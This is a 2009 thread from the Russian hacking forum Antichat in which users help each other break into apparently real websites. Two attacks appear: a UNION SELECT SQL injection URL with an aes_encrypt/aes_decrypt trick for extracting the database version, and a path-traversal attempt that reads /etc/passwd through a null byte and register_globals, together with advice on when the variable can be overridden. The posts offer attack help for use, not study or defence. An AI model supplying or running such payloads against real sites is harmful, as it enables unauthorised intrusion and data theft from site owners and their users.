HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 22.02.2009, 17:27
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
С нами: 9416045

Репутация: 126
По умолчанию

1. До перестановки системы у меня в закладках был хороший онлайн декодирощик, адрес вспомнить немогу... а он во всё подряд переводил... сожет кто подкинет линк. кто чем пользуется!.

2. /index1.php?show=about&id0=-1+union+select+1,2,3 --

вывод на 2 поля 1 и 2 .... пишу version() или @@version ошибка.. что делать?
 
Ответить с цитированием

  #2  
Старый 22.02.2009, 17:34
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

2 F4R

www.x3k.ru
http://www.webfuture.ru/igo/convert.php


/index1.php?show=about&id0=-1+union+select+1,aes_decrypt(aes_encrypt(version() ),0x71),0x71),3 --
 
Ответить с цитированием

  #3  
Старый 22.02.2009, 17:38
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
С нами: 9416045

Репутация: 126
По умолчанию

Цитата:
Сообщение от Gorev  
2 F4R

www.x3k.ru
http://www.webfuture.ru/igo/convert.php


/index1.php?show=about&id0=-1+union+select+1,aes_decrypt(aes_encrypt(version() ),0x71),0x71),3 --

x2k.ru

тормозной и неудобный а второй тока в sql и ораклу умеет... нао что то другое... или может есть какая то програмулька ?

а насчёт aes_decrypt(aes_encrypt(version() ),0x71),0x71)

неканает!
 
Ответить с цитированием

  #4  
Старый 22.02.2009, 17:40
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

попробуй тогда

unhex i hex
 
Ответить с цитированием

  #5  
Старый 22.02.2009, 18:22
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами: 9288132

Репутация: 571
По умолчанию

Цитата:
а второй тока в sql и ораклу умеет
А что тебе ещё надо?

Цитата:
а насчёт aes_decrypt(aes_encrypt(version() ),0x71),0x71)

неканает!
@@version?
Кинь ссылку, да и все..
 
Ответить с цитированием

  #6  
Старый 22.02.2009, 18:39
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

2 R1dex
уже всё решили по аcьке там всё тривиально, просто до невозможного, но парень молодой у него всё получится...
 
Ответить с цитированием

  #7  
Старый 22.02.2009, 19:23
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
С нами: 9416045

Репутация: 126
По умолчанию

Цитата:
Сообщение от Gorev  
2 R1dex
уже всё решили по аcьке там всё тривиально, просто до невозможного, но парень молодой у него всё получится...

да, огромное тебе спасибо!
 
Ответить с цитированием

  #8  
Старый 22.02.2009, 20:11
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

Код:
Есть скрипт следующего содержания:

<?php
$base_url="";
require_once("func.php");
$l=db_connect();
$id_page=28;
echo_body($id_page);
require($base_url."inc/top2.inc.php");
//==
?>
<?php
//==
require($base_url."inc/bottom6.inc.php");?>  

на сервере register_globals = On и mysql_quotes_gpc = Off

Могу ли я переопределить переменную $base_url ?

Пробовал так:

site.ru/script.php?base_url=../../../../../../../../../../../../etc/passwd%00

Но не сработало...
 
Ответить с цитированием

  #9  
Старый 22.02.2009, 21:12
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

Цитата:
Сообщение от Велемир  
Могу ли я переопределить переменную $base_url ?
Как обычно умудрился внести путаницу даже в этот вопрос

Если это один скрипт, то нет не сможешь. Если это 2 разных файла то во втором сможешь

Тоесть тут
PHP код:
<?php
$base_url
="";
require_once(
"func.php");
$l=db_connect();
$id_page=28;
echo_body($id_page);
require(
$base_url."inc/top2.inc.php");
//==
?>
Переменная определена
а тут нет
PHP код:
<?php
//==
require($base_url."inc/bottom6.inc.php");
?>
Если всё это в одном файле, то нет. Я просто зная твои вопросы не удивлюсь , если это 2 разных файла.
-------------------------------
2 it's mу ты или перепиши код в вопросе, или на словах объясни, что там у тебя на что заменяется. Твой код вообще работать не будет, и логика SQL запроса тоже не вполне понятна
 
Ответить с цитированием

  #10  
Старый 22.02.2009, 21:59
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

В одном файле.Но разные скрипты.Какая разница,определена переменная или нет.если регистр глобалс есть,а значит я могу переопределить любую переменную.Разве не так ?)Во всех файлах такая же фигня =_=
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.